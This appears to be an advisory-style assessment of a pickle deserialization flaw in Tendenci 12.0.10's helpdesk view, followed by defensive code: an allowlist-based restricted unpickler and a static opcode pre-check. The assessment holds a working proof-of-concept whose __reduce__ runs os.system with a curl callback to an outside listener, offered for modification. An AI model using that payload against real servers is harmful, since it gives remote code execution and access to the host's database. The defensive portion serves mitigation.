Tendenci 12.0.10 allows unrestricted deserialization in apps\helpdesk\views\staff.py.
Recent assessments:
kevthehermit at June 21, 2020 7:03pm UTC reported:
Untrusted data from the client side is used to create a python pickled object. This can lead to full RCE and compromise of the host. There are some limitations and this is not the default configuration.
If you can control the input it may be possible to gain code execution on the underlying server. With code execution you can gain full access to the database and its data.
The helpdesk module is not enabled by default.
A valid authenticated account with permissions to access /tickets
This doesn't appear to be patched in the latest release, although it has been acknowledged.
It is fairly easy to create a functional POC against this target if the feature is enabled.
Modify the following POC to fit your needs.
    import pickle
    import base64
    import os

    class RCE:
        # pickle calls __reduce__ when serialising; the returned (callable, args)
        # pair is what the unpickler invokes on load, here os.system with a curl command.
        def __reduce__(self):
            cmd = 'curl 172.22.0.1:1234'
            return os.system, (cmd,)

    if __name__ == '__main__':
        pickled = pickle.dumps(RCE())
        # URL-safe base64 matches the encoding the vulnerable view expects.
        print(base64.urlsafe_b64encode(pickled))
Assessed Attacker Value: 2
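A defensive counterpart to the deserialization issue described in the assessment above, added here as an example and not code from the assessment or from Tendenci: a restricted unpickler that resolves only allowlisted globals, plus a static pre-check that lists which globals a pickle would import without executing it. The allowlist, the Gadget class and the sample payloads are constructed for this example.

```python
import io
import pickle
import pickletools
from collections import OrderedDict

# Globals a ticket payload may legitimately resolve. Constructed for this example;
# a real deployment lists only the classes its own data actually needs.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}

class RestrictedUnpickler(pickle.Unpickler):
    """Refuse every global lookup (GLOBAL / STACK_GLOBAL) outside the allowlist."""
    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")

def referenced_globals(data: bytes) -> list[tuple[str, str]]:
    """List the module.name pairs a pickle would import, without executing it.
    Triage only: it follows string pushes but not memo gets, so use it alongside
    RestrictedUnpickler rather than instead of it."""
    refs, strings = [], []
    for opcode, arg, _ in pickletools.genops(data):
        if opcode.name == "GLOBAL":                 # protocol <= 3: "module name"
            refs.append(tuple(arg.split(" ", 1)))
        elif opcode.name.endswith("UNICODE"):       # a pushed string constant
            strings.append(arg)
        elif opcode.name == "STACK_GLOBAL":         # protocol >= 4: last two strings
            refs.append((strings[-2], strings[-1]))
    return refs

def load_ticket_payload(data: bytes):
    """Return ('ok', obj) for an acceptable pickle, ('rejected', reason) otherwise."""
    bad = [g for g in referenced_globals(data) if g not in ALLOWED_GLOBALS]
    if bad:
        return ("rejected", f"references {bad}")
    try:
        return ("ok", RestrictedUnpickler(io.BytesIO(data)).load())
    except pickle.UnpicklingError as exc:
        return ("rejected", str(exc))

# Constructed samples: a harmless gadget whose __reduce__ makes the loader call
# builtins.print, next to a legitimate OrderedDict payload.
class Gadget:
    def __reduce__(self):
        return (print, ("unpickling ran a callable",))

GADGET_P3 = pickle.dumps(Gadget(), protocol=3)   # emits GLOBAL
GADGET_P4 = pickle.dumps(Gadget(), protocol=4)   # emits STACK_GLOBAL
BENIGN = pickle.dumps(OrderedDict(ticket=42), protocol=4)

if __name__ == "__main__":
    for label, blob in (("gadget", GADGET_P4), ("benign", BENIGN)):
        print(label, load_ticket_payload(blob))
```

The pre-check catches both pickle encodings of a global reference, and the restricted loader is the backstop for anything the static pass misses.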